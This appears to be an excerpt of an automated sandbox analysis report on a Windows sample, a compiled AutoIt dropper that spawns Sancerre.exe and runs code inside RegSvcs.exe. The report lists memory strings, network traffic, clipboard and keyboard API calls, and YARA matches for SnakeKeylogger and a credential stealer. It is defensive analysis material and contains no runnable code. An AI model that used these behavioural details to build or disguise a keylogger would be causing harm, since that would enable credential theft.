                  Source: RegSvcs.exe, 00000002.00000002.2974305954.0000000002E10000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.000000000313F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                  Source: RegSvcs.exe, 00000002.00000002.2974305954.0000000002CA0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002D10000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003040000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: Sancerre.exe, 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002CA0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Sancerre.exe, 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000002FD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: RegSvcs.exe, 00000008.00000002.2973433634.0000000003066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                  Source: RegSvcs.exe, 00000002.00000002.2974305954.0000000002D10000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002CCA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000002FFA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003040000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                  Source: RegSvcs.exe, 00000002.00000002.2979175921.0000000003F21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003D2F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003DA4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003FF7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003ED3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003D7D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.000000000405F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.00000000040AD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004326000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004203000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.00000000040D4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004251000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.000000000308A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                  Source: RegSvcs.exe, 00000002.00000002.2979175921.0000000003D7F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003EAE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003D35000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003EDB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003D0A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004065000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.00000000040AF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.00000000041DE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004209000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.000000000403A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004302000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                  Source: RegSvcs.exe, 00000002.00000002.2979175921.0000000003F21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003D2F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003DA4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003FF7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003ED3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003D7D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.000000000405F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.00000000040AD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004326000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004203000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.00000000040D4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004251000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.000000000308A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                  Source: RegSvcs.exe, 00000002.00000002.2979175921.0000000003D7F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003EAE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003D35000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003EDB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003D0A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004065000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.00000000040AF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.00000000041DE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004209000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.000000000403A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004302000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                  Source: RegSvcs.exe, 00000008.00000002.2973433634.0000000003166000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.000000000308A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: RegSvcs.exe, 00000002.00000002.2974305954.0000000002E37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/H
                  Source: RegSvcs.exe, 00000002.00000002.2974305954.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003170000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49751 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49772 version: TLS 1.2
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DCEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00DCEAFF
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DCED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00DCED6A
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005EED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_005EED6A
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DCEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00DCEAFF
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DBAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_00DBAA57
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DE9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00DE9576
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_00609576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,1_2_00609576

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 1.2.Sancerre.exe.730000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 1.2.Sancerre.exe.730000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 1.2.Sancerre.exe.730000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 5.2.Sancerre.exe.1450000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 5.2.Sancerre.exe.1450000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 5.2.Sancerre.exe.1450000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 1.2.Sancerre.exe.730000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 1.2.Sancerre.exe.730000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 1.2.Sancerre.exe.730000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 5.2.Sancerre.exe.1450000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 5.2.Sancerre.exe.1450000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 5.2.Sancerre.exe.1450000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: Process Memory Space: Sancerre.exe PID: 5812, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: RegSvcs.exe PID: 3328, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: Sancerre.exe PID: 3244, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Binary is likely a compiled AutoIt script file
                  Source: AHSlIDftf1.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: AHSlIDftf1.exe, 00000000.00000000.1702664723.0000000000E12000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_26864ab8-f
                  Source: AHSlIDftf1.exe, 00000000.00000000.1702664723.0000000000E12000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_4cec253b-9
                  Source: AHSlIDftf1.exe, 00000000.00000003.1732840356.0000000003AD1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_df722f44-8
                  Source: AHSlIDftf1.exe, 00000000.00000003.1732840356.0000000003AD1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_e0272d24-5
                  Source: Sancerre.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: Sancerre.exe, 00000001.00000000.1733098011.0000000000632000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_fbbf0979-3
                  Source: Sancerre.exe, 00000001.00000000.1733098011.0000000000632000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_62d283cb-d
                  Source: Sancerre.exe, 00000005.00000002.1921474420.0000000000632000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_d0e3a150-3
                  Source: Sancerre.exe, 00000005.00000002.1921474420.0000000000632000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_7561d223-4
                  Source: AHSlIDftf1.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_089b92cc-0
